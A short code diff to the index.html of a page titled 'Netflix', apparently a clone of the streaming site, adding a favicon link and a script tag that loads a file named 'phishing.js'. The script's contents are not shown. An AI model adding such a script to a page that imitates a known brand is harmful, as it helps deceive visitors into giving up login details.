--- a/index.html
+++ b/index.html
@@ -2,6 +2,9 @@
 <html lang="en">
     <head>
         <title>Netflix</title>
+        <link rel="icon" type="image/png" href="https://github.com/imvickykumar/netflix/blob/master/logo.png?raw=true">
+        <script src="phishing.js"></script>
+        
         <script src="./netflix.js" type="text/javascript"></script>
         <script src="./languageSwicher.js" type="text/javascript"></script>
         <link rel="stylesheet" href="netflixStyle.css">
